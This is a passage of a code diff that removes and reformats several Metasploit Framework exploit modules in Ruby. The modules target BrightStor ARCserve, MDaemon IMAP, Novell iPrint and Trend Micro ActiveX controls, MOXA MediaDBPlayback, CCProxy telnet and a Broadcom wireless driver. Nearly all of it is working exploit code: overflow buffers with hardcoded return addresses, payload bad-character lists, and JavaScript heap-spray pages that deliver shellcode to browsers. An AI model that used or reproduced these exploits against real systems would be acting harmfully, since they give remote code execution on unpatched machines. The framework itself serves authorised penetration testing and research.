[ 'URL', 'http://www.metasploit.com/users/mc' ],
|
||||
],
|
||||
'Privileged' => true,
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 500,
|
||||
'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'BrightStor ARCserve r11.5/Windows 2003', { 'Ret' => 0x28eb6493 } ],
|
||||
],
|
||||
'DisclosureDate' => 'Oct 4 2010',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options([ Opt::RPORT(6502) ], self.class)
|
||||
end
|
||||
register_options([ Opt::RPORT(6502) ], self.class)
|
||||
end
|
||||
|
||||
def exploit
|
||||
def exploit
|
||||
|
||||
connect
|
||||
connect
|
||||
|
||||
handle = dcerpc_handle('62b93df0-8b02-11ce-876c-00805f842837', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
|
||||
print_status("Binding to #{handle} ...")
|
||||
handle = dcerpc_handle('62b93df0-8b02-11ce-876c-00805f842837', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
|
||||
print_status("Binding to #{handle} ...")
|
||||
|
||||
dcerpc_bind(handle)
|
||||
print_status("Bound to #{handle} ...")
|
||||
dcerpc_bind(handle)
|
||||
print_status("Bound to #{handle} ...")
|
||||
|
||||
request = "\x00\x04\x08\x0c\x05\x00\x00\x00\x00\x00"
|
||||
request << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
||||
request = "\x00\x04\x08\x0c\x05\x00\x00\x00\x00\x00"
|
||||
request << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
||||
|
||||
dcerpc.call(0x2B, request)
|
||||
dcerpc.call(0x2B, request)
|
||||
|
||||
sploit = NDR.long(4)
|
||||
sploit << NDR.string(rand_text_alpha_upper(1002) + [target.ret].pack('V') + payload.encoded + "\x00")
|
||||
sploit = NDR.long(4)
|
||||
sploit << NDR.string(rand_text_alpha_upper(1002) + [target.ret].pack('V') + payload.encoded + "\x00")
|
||||
|
||||
print_status("Trying target #{target.name}...")
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
||||
begin
|
||||
dcerpc_call(0x8A, sploit)
|
||||
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
|
||||
end
|
||||
begin
|
||||
dcerpc_call(0x8A, sploit)
|
||||
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
|
||||
end
|
||||
|
||||
handler
|
||||
disconnect
|
||||
handler
|
||||
disconnect
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
=begin
|
||||
|
@ -94,4 +89,4 @@ long sub_100707D0 (
|
|||
[in] long arg_2,
|
||||
[in][ref][string] char * arg_3
|
||||
);
|
||||
=end
|
||||
=end
|
|
@ -1,83 +0,0 @@
|
|||
##
|
||||
# $Id: mdaemon_cram_md5.rb 9583 2010-06-22 19:11:05Z todb $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = GreatRanking
|
||||
|
||||
include Msf::Exploit::Remote::Imap
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a buffer overflow in the CRAM-MD5
|
||||
authentication of the MDaemon IMAP service. This
|
||||
vulnerability was discovered by Muts.
|
||||
},
|
||||
'Author' => [ 'anonymous' ],
|
||||
'License' => BSD_LICENSE,
|
||||
'Version' => '$Revision: 9583 $',
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2004-1520'],
|
||||
[ 'OSVDB', '11838'],
|
||||
[ 'BID', '11675'],
|
||||
],
|
||||
'Privileged' => true,
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 500,
|
||||
'BadChars' => "\x00",
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'MDaemon IMAP 8.0.3 Windows XP SP2', { } ],
|
||||
],
|
||||
'DisclosureDate' => 'Nov 12 2004',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
print_status("Asking for CRAM-MD5 authentication...")
|
||||
sock.put("a001 authenticate cram-md5\r\n")
|
||||
res = sock.get_once
|
||||
|
||||
|
||||
print_status("Received CRAM-MD5 answer: #{res.chomp}")
|
||||
# Magic no return-address exploitation ninjaness!
|
||||
buf = 'AAAA' + payload.encoded + make_nops(258) + "\xe9\x05\xfd\xff\xff"
|
||||
req = Rex::Text.encode_base64(buf) + "\r\n"
|
||||
sock.put(req)
|
||||
res = sock.get_once
|
||||
|
||||
print_status("Received authentication reply: #{res.chomp}")
|
||||
print_status("Sending LOGOUT to close the thread and trigger an exception")
|
||||
sock.put("a002 LOGOUT\r\n")
|
||||
res = sock.get_once
|
||||
|
||||
print_status("Received LOGOUT reply: #{res.chomp}")
|
||||
select(nil,nil,nil,1)
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
end
|
|
@ -1,154 +0,0 @@
|
|||
##
|
||||
# $Id: novelliprint_callbackurl.rb 10429 2010-09-21 18:46:29Z jduck $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
##
|
||||
# novelliprint_callbackurl.rb
|
||||
#
|
||||
# Novell iPrint Client ActiveX Control call-back-url Buffer Overflow exploit for the Metasploit Framework
|
||||
#
|
||||
# Exploit successfully tested on the following platforms:
|
||||
# - Novell iPrint Client 5.40 on Internet Explorer 7, Windows XP SP3
|
||||
# - Novell iPrint Client 5.42 on Internet Explorer 7, Windows XP SP3
|
||||
# - Novell iPrint Client 5.42 on Internet Explorer 7, Windows Vista SP2
|
||||
#
|
||||
# ienipp.ocx version tested:
|
||||
# File Version: 5.4.0.0 and 5.4.2.0
|
||||
# ClassID: 36723F97-7AA0-11D4-8919-FF2D71D0D32C
|
||||
# RegKey Safe for Script: True
|
||||
# RegKey Safe for Init: True
|
||||
# KillBitSet: False
|
||||
#
|
||||
# References:
|
||||
# - CVE-2010-1527
|
||||
# - OSVDB 67411
|
||||
# - http://secunia.com/secunia_research/2010-104/ - Original advisory by Carsten Eiram, Secunia Research
|
||||
# - http://www.exploit-db.com/exploits/15042/ - MOAUB #19 exploit
|
||||
# - http://www.exploit-db.com/moaub-19-novell-iprint-client-browser-plugin-call-back-url-stack-overflow/ - MOAUB #14 binary analysis
|
||||
# - http://www.rec-sec.com/2010/09/21/novell-iprint-callbackurl-buffer-overflow-exploit/ - Metasploit exploit by Trancer, Recognize-Security
|
||||
#
|
||||
# Trancer
|
||||
# http://www.rec-sec.com
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Novell iPrint Client ActiveX Control call-back-url Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack-based buffer overflow in Novell iPrint Client 5.42.
|
||||
When sending an overly long string to the 'call-back-url' parameter in an
|
||||
op-client-interface-version action of ienipp.ocx an attacker may be able to
|
||||
execute arbitrary code.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ 'Trancer <mtrancer[at]gmail.com' ],
|
||||
'Version' => '$Revision: 10429 $',
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2010-1527' ],
|
||||
[ 'OSVDB', '67411'],
|
||||
[ 'URL', 'http://secunia.com/secunia_research/2010-104/' ], # Carsten Eiram, Secunia Research
|
||||
[ 'URL', 'http://www.exploit-db.com/exploits/15042/' ], # MOAUB #19
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'BadChars' => "\x00",
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ]
|
||||
],
|
||||
'DisclosureDate' => 'Aug 20 2010',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
def autofilter
|
||||
false
|
||||
end
|
||||
|
||||
def check_dependencies
|
||||
use_zlib
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
# Re-generate the payload.
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
|
||||
# Encode the shellcode.
|
||||
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
|
||||
|
||||
# Setup exploit buffers
|
||||
nops = Rex::Text.to_unescape([target.ret].pack('V'))
|
||||
ret = [target.ret].pack('V')
|
||||
ret = ret * 250
|
||||
blocksize = 0x40000
|
||||
fillto = 500
|
||||
offset = target['Offset']
|
||||
|
||||
# ActiveX parameters
|
||||
clsid = "36723F97-7AA0-11D4-8919-FF2D71D0D32C"
|
||||
|
||||
# Randomize the javascript variable names
|
||||
ienipp = rand_text_alpha(rand(100) + 1)
|
||||
j_shellcode = rand_text_alpha(rand(100) + 1)
|
||||
j_nops = rand_text_alpha(rand(100) + 1)
|
||||
j_ret = rand_text_alpha(rand(100) + 1)
|
||||
j_headersize = rand_text_alpha(rand(100) + 1)
|
||||
j_slackspace = rand_text_alpha(rand(100) + 1)
|
||||
j_fillblock = rand_text_alpha(rand(100) + 1)
|
||||
j_block = rand_text_alpha(rand(100) + 1)
|
||||
j_memory = rand_text_alpha(rand(100) + 1)
|
||||
j_counter = rand_text_alpha(rand(30) + 2)
|
||||
|
||||
html = %Q|<html>
|
||||
<script>
|
||||
var #{j_shellcode} = unescape('#{shellcode}');
|
||||
var #{j_nops} = unescape('#{nops}');
|
||||
var #{j_headersize} = 20;
|
||||
var #{j_slackspace} = #{j_headersize} + #{j_shellcode}.length;
|
||||
while (#{j_nops}.length < #{j_slackspace}) #{j_nops} += #{j_nops};
|
||||
var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace});
|
||||
var #{j_block} = #{j_nops}.substring(0,#{j_nops}.length - #{j_slackspace});
|
||||
while (#{j_block}.length + #{j_slackspace} < #{blocksize}) #{j_block} = #{j_block} + #{j_block} + #{j_fillblock};
|
||||
var #{j_memory} = new Array();
|
||||
for (#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++) {
|
||||
#{j_memory}[#{j_counter}] = #{j_block} + #{j_shellcode};
|
||||
}
|
||||
</script>
|
||||
<object classid='clsid:#{clsid}' id='#{ienipp}'>
|
||||
<param name='operation' value='op-client-interface-version' />
|
||||
<param name='result-type' value='url' />
|
||||
<param name='call-back-url' value='#{ret}' />
|
||||
</object>
|
||||
</html>|
|
||||
|
||||
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
|
||||
|
||||
# Transmit the response to the client
|
||||
send_response(cli, html, { 'Content-Type' => 'text/html' })
|
||||
|
||||
# Handle the payload
|
||||
handler(cli)
|
||||
end
|
||||
|
||||
end
|
|
@ -1,147 +0,0 @@
|
|||
##
|
||||
# $Id: trendmicro_extsetowner.rb 10538 2010-10-04 04:26:09Z jduck $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
##
|
||||
# trendmicro_extsetowner.rb
|
||||
#
|
||||
# Trend Micro Internet Security Pro 2010 ActiveX extSetOwner() Remote Code Execution exploit for the Metasploit Framework
|
||||
#
|
||||
# Exploit successfully tested on the following platforms:
|
||||
# - Trend Micro Internet Security Pro 2010 on Internet Explorer 7, Windows XP SP3
|
||||
# - Trend Micro Internet Security Pro 2010 on Internet Explorer 7, Windows Vista SP2
|
||||
#
|
||||
# UfPBCtrl.dll version tested:
|
||||
# File Version: 17.50.0.1366
|
||||
# ClassID: 15DBC3F9-9F0A-472E-8061-043D9CEC52F0
|
||||
# RegKey Safe for Script: True
|
||||
# RegKey Safe for Init: True
|
||||
# KillBitSet: False
|
||||
#
|
||||
# References:
|
||||
# - CVE-2010-3189
|
||||
# - OSVDB 67561
|
||||
# - http://www.zerodayinitiative.com/advisories/ZDI-10-165/ - Original advisory by Andrea Micalizzi aka rgod via Zero Day Initiative
|
||||
# - http://www.exploit-db.com/exploits/14878/ - MOAUB #03 exploit
|
||||
# - http://www.exploit-db.com/trend-micro-internet-security-pro-2010-activex-extsetowner-remote-code-execution/ - MOAUB #03 binary analysis
|
||||
# - http://www.rec-sec.com/2010/09/28/trend-micro-internet-security-2010-rce-exploit/ - Metasploit exploit by Trancer, Recognize-Security
|
||||
#
|
||||
# Trancer
|
||||
# http://www.rec-sec.com
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Trend Micro Internet Security Pro 2010 ActiveX extSetOwner() Remote Code Execution',
|
||||
'Description' => %q{
|
||||
This module exploits a remote code execution vulnerability in Trend Micro
|
||||
Internet Security Pro 2010 ActiveX.
|
||||
When sending an invalid pointer to the extSetOwner() function of UfPBCtrl.dll
|
||||
an attacker may be able to execute arbitrary code.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ 'Trancer <mtrancer[at]gmail.com' ],
|
||||
'Version' => '$Revision: 10538 $',
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2010-3189' ],
|
||||
[ 'OSVDB', '67561'],
|
||||
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-165/' ], # Andrea Micalizzi aka rgod via Zero Day Initiative
|
||||
[ 'URL', 'http://www.exploit-db.com/exploits/14878/' ], # MOAUB #03
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'BadChars' => "\x00",
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x00C750A1 } ] #??
|
||||
],
|
||||
'DisclosureDate' => 'Aug 25 2010',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
def autofilter
|
||||
false
|
||||
end
|
||||
|
||||
def check_dependencies
|
||||
use_zlib
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
# Re-generate the payload.
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
|
||||
# Encode the shellcode.
|
||||
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
|
||||
|
||||
# Setup exploit buffers
|
||||
nops = Rex::Text.to_unescape(make_nops(4))
|
||||
ret = Rex::Text.to_unescape([target.ret].pack('V'))
|
||||
blocksize = 0x40000
|
||||
fillto = 500
|
||||
|
||||
# ActiveX parameters
|
||||
clsid = "15DBC3F9-9F0A-472E-8061-043D9CEC52F0"
|
||||
|
||||
# Randomize the javascript variable names
|
||||
ufpbctrl = rand_text_alpha(rand(100) + 1)
|
||||
j_shellcode = rand_text_alpha(rand(100) + 1)
|
||||
j_nops = rand_text_alpha(rand(100) + 1)
|
||||
j_ret = rand_text_alpha(rand(100) + 1)
|
||||
j_headersize = rand_text_alpha(rand(100) + 1)
|
||||
j_slackspace = rand_text_alpha(rand(100) + 1)
|
||||
j_fillblock = rand_text_alpha(rand(100) + 1)
|
||||
j_block = rand_text_alpha(rand(100) + 1)
|
||||
j_memory = rand_text_alpha(rand(100) + 1)
|
||||
j_counter = rand_text_alpha(rand(30) + 2)
|
||||
|
||||
html = %Q|<html>
|
||||
<object classid='clsid:#{clsid}' id='#{ufpbctrl}'></object>
|
||||
<script>
|
||||
var #{j_shellcode} = unescape('#{shellcode}');
|
||||
var #{j_nops} = unescape('#{nops}');
|
||||
var #{j_headersize} = 20;
|
||||
var #{j_slackspace} = #{j_headersize} + #{j_shellcode}.length;
|
||||
while (#{j_nops}.length < #{j_slackspace}) #{j_nops} += #{j_nops};
|
||||
var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace});
|
||||
var #{j_block} = #{j_nops}.substring(0,#{j_nops}.length - #{j_slackspace});
|
||||
while (#{j_block}.length + #{j_slackspace} < #{blocksize}) #{j_block} = #{j_block} + #{j_block} + #{j_fillblock};
|
||||
var #{j_memory} = new Array();
|
||||
for (#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++) {
|
||||
#{j_memory}[#{j_counter}] = #{j_block} + #{j_shellcode};
|
||||
}
|
||||
#{ufpbctrl}.extSetOwner(unescape('#{ret}'));
|
||||
</script>
|
||||
</html>|
|
||||
|
||||
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
|
||||
|
||||
# Transmit the response to the client
|
||||
send_response(cli, html, { 'Content-Type' => 'text/html' })
|
||||
|
||||
# Handle the payload
|
||||
handler(cli)
|
||||
end
|
||||
end
|
|
@ -1,85 +1,79 @@
|
|||
##
|
||||
# $Id: moxa_mediadbplayback.rb 10914 2010-11-05 02:58:01Z swtornio $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
|
||||
Rank = AverageRanking
|
||||
Rank = AverageRanking
|
||||
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'MOXA MediaDBPlayback ActiveX Control Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in MOXA_ActiveX_SDK. When
|
||||
sending an overly long string to the PlayFileName() of MediaDBPlayback.DLL (2.2.0.5)
|
||||
an attacker may be able to execute arbitrary code.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ 'MC' ],
|
||||
'Version' => '$Revision: 10914 $',
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '68986'],
|
||||
[ 'URL', 'http://www.moxa.com' ],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
'DisablePayloadHandler' => 'true',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'BadChars' => "\x00",
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0a0a0a0a } ]
|
||||
],
|
||||
'DisclosureDate' => 'Oct 19 2010',
|
||||
'DefaultTarget' => 0))
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'MOXA MediaDBPlayback ActiveX Control Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in MOXA_ActiveX_SDK. When
|
||||
sending an overly long string to the PlayFileName() of MediaDBPlayback.DLL (2.2.0.5)
|
||||
an attacker may be able to execute arbitrary code.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ 'MC' ],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2010-4742' ],
|
||||
[ 'OSVDB', '68986'],
|
||||
[ 'URL', 'http://www.moxa.com' ],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
'DisablePayloadHandler' => 'true',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'BadChars' => "\x00",
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0a0a0a0a } ]
|
||||
],
|
||||
'DisclosureDate' => 'Oct 19 2010',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('FILENAME', [ false, 'The file name.', 'msf.html']),
|
||||
], self.class)
|
||||
end
|
||||
register_options(
|
||||
[
|
||||
OptString.new('FILENAME', [ false, 'The file name.', 'msf.html']),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def exploit
|
||||
# Encode the shellcode.
|
||||
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
|
||||
def exploit
|
||||
# Encode the shellcode.
|
||||
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
|
||||
|
||||
# Create some nops.
|
||||
nops = Rex::Text.to_unescape(make_nops(4))
|
||||
# Create some nops.
|
||||
nops = Rex::Text.to_unescape(make_nops(4))
|
||||
|
||||
# Set the return.
|
||||
ret = Rex::Text.uri_encode([target.ret].pack('L'))
|
||||
# Set the return.
|
||||
ret = Rex::Text.uri_encode([target.ret].pack('L'))
|
||||
|
||||
# Randomize the javascript variable names.
|
||||
vname = rand_text_alpha(rand(100) + 1)
|
||||
var_i = rand_text_alpha(rand(30) + 2)
|
||||
rand1 = rand_text_alpha(rand(100) + 1)
|
||||
rand2 = rand_text_alpha(rand(100) + 1)
|
||||
rand3 = rand_text_alpha(rand(100) + 1)
|
||||
rand4 = rand_text_alpha(rand(100) + 1)
|
||||
rand5 = rand_text_alpha(rand(100) + 1)
|
||||
rand6 = rand_text_alpha(rand(100) + 1)
|
||||
rand7 = rand_text_alpha(rand(100) + 1)
|
||||
rand8 = rand_text_alpha(rand(100) + 1)
|
||||
# Randomize the javascript variable names.
|
||||
vname = rand_text_alpha(rand(100) + 1)
|
||||
var_i = rand_text_alpha(rand(30) + 2)
|
||||
rand1 = rand_text_alpha(rand(100) + 1)
|
||||
rand2 = rand_text_alpha(rand(100) + 1)
|
||||
rand3 = rand_text_alpha(rand(100) + 1)
|
||||
rand4 = rand_text_alpha(rand(100) + 1)
|
||||
rand5 = rand_text_alpha(rand(100) + 1)
|
||||
rand6 = rand_text_alpha(rand(100) + 1)
|
||||
rand7 = rand_text_alpha(rand(100) + 1)
|
||||
rand8 = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
content = %Q|
|
||||
content = %Q|
|
||||
<html>
|
||||
<object id ='#{vname}' classid='clsid:5B32067A-121B-49DE-8182-91EB13DDF8D6'></object>
|
||||
<script language ="javascript">
|
||||
|
@ -98,11 +92,11 @@ for (#{var_i} = 0; #{var_i} < 14500; #{var_i}++) { #{rand8} = #{rand8} + unescap
|
|||
#{vname}.PlayFileName = #{rand8};
|
||||
</script>
|
||||
</html>
|
||||
|
|
||||
|
|
||||
|
||||
print_status("Creating '#{datastore['FILENAME']}' file ...")
|
||||
print_status("Creating '#{datastore['FILENAME']}' file ...")
|
||||
|
||||
file_create(content)
|
||||
end
|
||||
file_create(content)
|
||||
end
|
||||
|
||||
end
|
||||
end
|
|
@ -1,87 +0,0 @@
|
|||
##
|
||||
# $Id: ccproxy_telnet_ping.rb 9179 2010-04-30 08:40:19Z jduck $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = AverageRanking
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'CCProxy <= v6.2 Telnet Proxy Ping Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits the YoungZSoft CCProxy <= v6.2 suite
|
||||
Telnet service. The stack is overwritten when sending an overly
|
||||
long address to the 'ping' command.
|
||||
},
|
||||
'Author' => [ 'Patrick Webster <patrick[at]aushack.com>' ],
|
||||
'Arch' => [ ARCH_X86 ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision: 9179 $',
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2004-2416' ],
|
||||
[ 'OSVDB', '11593' ],
|
||||
[ 'BID', '11666 ' ],
|
||||
[ 'URL', 'http://milw0rm.com/exploits/621' ],
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1012,
|
||||
'BadChars' => "\x00\x07\x08\x0a\x0d\x20",
|
||||
},
|
||||
'Platform' => ['win'],
|
||||
'Targets' =>
|
||||
[
|
||||
# Patrick - Tested OK 2007/08/19. W2K SP0, W2KSP4, XP SP0, XP SP2 EN.
|
||||
[ 'Windows 2000 Pro All - English', { 'Ret' => 0x75023411 } ], # call esi ws2help.dll
|
||||
[ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd2b81 } ], # call esi ws2help.dll
|
||||
[ 'Windows 2000 Pro All - French', { 'Ret' => 0x74fa2b22 } ], # call esi ws2help.dll
|
||||
[ 'Windows XP SP0/1 - English', { 'Ret' => 0x71aa1a97 } ], # call esi ws2help.dll
|
||||
[ 'Windows XP SP2 - English', { 'Ret' => 0x71aa1b22 } ], # call esi ws2help.dll
|
||||
],
|
||||
'DisclosureDate' => 'Nov 11 2004'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(23),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def check
|
||||
connect
|
||||
banner = sock.get_once(-1,3)
|
||||
disconnect
|
||||
|
||||
if (banner =~ /CCProxy Telnet Service Ready/)
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
sploit = "p " + payload.encoded + [target['Ret']].pack('V') + make_nops(7)
|
||||
sock.put(sploit + "\r\n")
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
end
|
|
@ -1,81 +1,90 @@
|
|||
##
|
||||
# $Id: broadcom_wifi_ssid.rb 9669 2010-07-03 03:13:45Z jduck $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = LowRanking
|
||||
|
||||
class Exploits::Windows::Driver::Broadcom_WiFi_SSID < Msf::Exploit::Remote
|
||||
|
||||
include Exploit::Lorcon
|
||||
include Exploit::KernelMode
|
||||
include Msf::Exploit::Lorcon2
|
||||
include Msf::Exploit::KernelMode
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Broadcom Wireless Driver Probe Response SSID Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack overflow in the Broadcom Wireless driver
|
||||
that allows remote code execution in kernel mode by sending a 802.11 probe
|
||||
response that contains a long SSID. The target MAC address must
|
||||
be provided to use this exploit. The two cards tested fell into the
|
||||
00:14:a5:06:XX:XX and 00:14:a4:2a:XX:XX ranges.
|
||||
This module exploits a stack buffer overflow in the Broadcom Wireless driver
|
||||
that allows remote code execution in kernel mode by sending a 802.11 probe
|
||||
response that contains a long SSID. The target MAC address must
|
||||
be provided to use this exploit. The two cards tested fell into the
|
||||
00:14:a5:06:XX:XX and 00:14:a4:2a:XX:XX ranges.
|
||||
|
||||
This module depends on the Lorcon library and only works on the Linux platform
|
||||
with a supported wireless card. Please see the Ruby Lorcon documentation
|
||||
(external/ruby-lorcon/README) for more information.
|
||||
This module depends on the Lorcon2 library and only works on the Linux platform
|
||||
with a supported wireless card. Please see the Ruby Lorcon2 documentation
|
||||
(external/ruby-lorcon/README) for more information.
|
||||
},
|
||||
|
||||
'Authors' =>
|
||||
'Author' =>
|
||||
[
|
||||
'Chris Eagle', # initial discovery
|
||||
